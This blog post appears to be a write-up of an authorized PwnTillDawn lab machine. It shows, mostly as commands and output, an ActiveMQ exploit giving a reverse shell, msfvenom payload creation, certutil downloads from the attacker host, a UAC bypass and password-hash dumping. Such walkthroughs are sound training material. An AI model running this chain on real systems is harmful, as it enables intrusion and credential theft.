ptd-hollywood-private

As always we start with a nmap scan

─[user@parrot-virtual]─[~/ptd]
└──╼ $nmap -Pn -p1-65535 10.150.150.219
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 08:55 BST
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 80.05% done; ETC: 08:56 (0:00:07 remaining)
Nmap scan report for 10.150.150.219
Host is up (0.032s latency).
Not shown: 65502 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
25/tcp    open  smtp
79/tcp    open  finger
80/tcp    open  http
105/tcp   open  csnet-ns
106/tcp   open  pop3pw
110/tcp   open  pop3
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
143/tcp   open  imap
443/tcp   open  https
445/tcp   open  microsoft-ds
554/tcp   open  rtsp
1883/tcp  open  mqtt
2224/tcp  open  efi-mg
2869/tcp  open  icslap
3306/tcp  open  mysql
5672/tcp  open  amqp
8009/tcp  open  ajp13
8080/tcp  open  http-proxy
8089/tcp  open  unknown
8161/tcp  open  patrol-snmp
10243/tcp open  unknown
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
49251/tcp open  unknown
61613/tcp open  unknown
61614/tcp open  unknown
61616/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 37.57 seconds
┌─[user@parrot-virtual]─[~/ptd]
└──╼ $

 

Next we browse to 

Welcome to the Apache ActiveMQ!
http://10.150.150.219:8161/
it has an msf exploit 
https://www.exploit-db.com/exploits/42283

.

.

msf6 exploit(windows/http/apache_activemq_traversal_upload) > show options

Module options (exploit/windows/http/apache_activemq_traversal_upload):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD admin yes Password to authenticate with
PATH /fileserver/..\admin\ yes Traversal path
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.150.150.219 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8161 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the web application
USERNAME admin yes Username to authenticate with
VHOST no HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.66.66.210 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL no The system shell to use.


Exploit target:

Id Name
-- ----
0 Windows Java


msf6 exploit(windows/http/apache_activemq_traversal_upload) > run

[*] Started reverse TCP handler on 10.66.66.210:4444 
[*] Uploading payload...
[*] Payload sent. Attempting to execute the payload.
[+] Payload executed!
[*] Command shell session 1 opened (10.66.66.210:4444 -> 10.150.150.219:49284) at 2020-08-26 09:18:27 +0100

C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin>whoami
whoami
hollywood\user

C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin>

next we create a meterpreter executable

─[user@parrot-virtual]─[~/Downloads] $msfvenom -p windows/meterpreter/reverse_tcp lhost=10.66.66.210 lport=7777 -f exe > 7777.exe

.

─[✗]─[user@parrot-virtual]─[~/Downloads]
└──╼ $sudo python3 -m http.server 80
[sudo] password for user: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.150.150.219 - - [26/Aug/2020 09:25:00] "GET /7777.exe HTTP/1.1" 200 -
10.150.150.219 - - [26/Aug/2020 09:25:00] "GET /7777.exe HTTP/1.1" 200 -
c:\puck>certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe
certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe
**** Online ****
000000 ...
01204a
CertUtil: -URLCache command completed successfully.

c:\puck>dir
dir
Volume in drive C has no label.
Volume Serial Number is 021A-9C32

Directory of c:\puck

08/26/2020 05:21 PM <DIR> .
08/26/2020 05:21 PM <DIR> ..
08/26/2020 05:21 PM 73,802 7777.exe
1 File(s) 73,802 bytes
2 Dir(s) 44,543,938,560 bytes free

c:\puck>

start the listener , and then execute c:\puck>7777.exe

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => 10.66.66.210
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.66.66.210:7777 
msf6 exploit(multi/handler) >

.

msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell java/linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

c:\puck>7777.exe
7777.exe

c:\puck>
[*] Sending stage (175174 bytes) to 10.150.150.219
[*] Meterpreter session 2 opened (10.66.66.210:7777 -> 10.150.150.219:49293) at 2020-08-26 09:32:53 +0100


c:\puck>
c:\puck>^Z
Background session 1? [y/N] y
msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell java/linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)
2 meterpreter x86/windows HOLLYWOOD\User @ HOLLYWOOD 10.66.66.210:7777 -> 10.150.150.219:49293 (10.150.150.219)

msf6 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > hashdump 
[-] 2007: Operation failed: The parameter is incorrect.
meterpreter > 


meterpreter > shell
Process 5088 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\puck>whoami
whoami
hollywood\user

c:\puck>
c:\puck>^Z
Background channel 1? [y/N] y
meterpreter > 
Background session 2? [y/N] 
msf6 exploit(multi/handler) > search suggester

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester


msf6 exploit(multi/handler) > use 0
msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.150.150.219 - Collecting local exploits for x86/windows...

[*] 10.150.150.219 - 34 exploit checks are being tried...
[+] 10.150.150.219 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.150.150.219 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) >
msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/bypassuac_eventvwr) > set session 2
session => 2
msf6 exploit(windows/local/bypassuac_eventvwr) > run

[-] Handler failed to bind to 10.66.66.210:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\System32\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175174 bytes) to 10.150.150.219
[*] Meterpreter session 3 opened (10.66.66.210:4444 -> 10.150.150.219:49300) at 2020-08-26 09:44:50 +0100

[*] Cleaning up registry keys ...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_eventvwr) > 
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell java/linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)
2 meterpreter x86/windows HOLLYWOOD\User @ HOLLYWOOD 10.66.66.210:7777 -> 10.150.150.219:49293 (10.150.150.219)
3 meterpreter x86/windows HOLLYWOOD\User @ HOLLYWOOD 10.66.66.210:4444 -> 10.150.150.219:49300 (10.150.150.219)

msf6 exploit(windows/local/bypassuac_eventvwr) >
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 
4 0 System x86 0 
244 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
328 312 csrss.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
364 3876 xampp-control.exe x86 1 HOLLYWOOD\User C:\xampp\xampp-control.exe
400 3876 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
408 312 wininit.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
416 400 csrss.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
464 400 winlogon.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
512 408 services.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
520 408 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
528 408 lsm.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
624 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
684 512 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
728 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
816 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
864 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
892 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
912 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
916 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1028 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1200 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
1224 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
1384 512 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1412 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
1504 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1612 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
1664 512 splunkd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
1700 512 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\dllhost.exe
1728 328 conhost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
1760 512 VGAuthService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1816 512 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1832 624 WmiPrvSE.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\wbem\wmiprvse.exe
1880 364 mysqld.exe x86 1 HOLLYWOOD\User c:\xampp\mysql\bin\mysqld.exe
2240 512 SearchIndexer.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchIndexer.exe
2520 1664 splunk-winevtlog.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
2640 364 FileZillaServer.exe x86 1 HOLLYWOOD\User c:\xampp\filezillaftp\filezillaserver.exe
2676 364 mercury.exe x86 1 HOLLYWOOD\User c:\xampp\MercuryMail\mercury.exe
2748 400 java.exe x86 1 HOLLYWOOD\User C:\Program Files\Common Files\Oracle\Java\javapath\java.exe
2824 3876 jusched.exe x86 1 HOLLYWOOD\User C:\Program Files\Common Files\Java\Java Update\jusched.exe
2908 3916 httpd.exe x86 1 HOLLYWOOD\User C:\xampp\apache\bin\httpd.exe
2992 5004 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
3008 2748 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
3124 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
3156 3876 vmtoolsd.exe x86 1 HOLLYWOOD\User C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
3472 364 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\System32\cmd.exe
3548 512 taskhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\taskhost.exe
3640 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
3776 3472 java.exe x86 1 HOLLYWOOD\User C:\Program Files\Java\jre1.8.0_231\bin\java.exe
3820 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3840 864 dwm.exe x86 1 HOLLYWOOD\User C:\Windows\system32\Dwm.exe
3856 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
3876 3608 explorer.exe x86 1 HOLLYWOOD\User C:\Windows\Explorer.EXE
3916 364 httpd.exe x86 1 HOLLYWOOD\User c:\xampp\apache\bin\httpd.exe
3968 512 wmpnetwk.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Program Files\Windows Media Player\wmpnetwk.exe
4080 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
4632 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
4824 512 taskhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\taskhost.exe
4912 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
5004 3008 7777.exe x86 1 HOLLYWOOD\User c:\puck\7777.exe
5088 5004 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
5356 4372 powershell.exe x86 1 HOLLYWOOD\User C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
5904 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe

meterpreter > migrate 3820
[*] Migrating from 5356 to 3820...
[*] Migration completed successfully.
meterpreter > shell
Process 5184 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

certutil -urlcache -split -f http://10.66.66.210/fgdump.exe c:\puck\fgdump.exe
certutil -urlcache -split -f http://10.66.66.210/winpeas.exe c:\puck\winpeas.exe
certutil -urlcache -split -f http://10.66.66.210/winpeas.bat c:\puck\winpeas.bat
certutil -urlcache -split -f http://10.66.66.210/Chimichurri.exe c:\puck\Chimichurri.exe
certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe

└──╼ $msfvenom -p windows/meterpreter/reverse_tcp lhost=10.66.66.210 lport=7777 -f exe > 7777.exe

multi/handler
run -j

 

powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\pwdump7.exe -Uri http://10.66.66.210/pwdump7.exe

certutil -urlcache -split -f http://10.66.66.210/pwdump8.exe c:\puck\pwdump8.exe

c:\puck>pwdump8.exe
pwdump8.exe

PwDump v8.2 – dumps windows password hashes – by Fulvio Zanetti & Andrea Petralia @ http://www.blackMath.it

Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
User:1000:AAD3B435B51404EEAAD3B435B51404EE:F9E1A02072D330DDF77AD82CB54D5EC4
HomeGroupUser$:1002:AAD3B435B51404EEAAD3B435B51404EE:283C3C4DC5544A73569F35F22A5B1DCA

c:\puck>
C:\Windows\system32>powershell -c Get-PSDrive
certutil -urlcache -split -f http://10.66.66.210/winpeas.exe c:\puck\winpeas.exe
certutil -urlcache -split -f http://10.66.66.210/winpeas.bat c:\puck\winpeas.bat

REG QUERY HKLM /v “EditionID” /s

Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.

Posted on

One thought on “ptd-hollywood-private”

  1. Incredibly well written, amazing to follow.

    Would you know why msf is coming back with failed upload for example? happened countless times.

Leave a Reply

Your email address will not be published. Required fields are marked *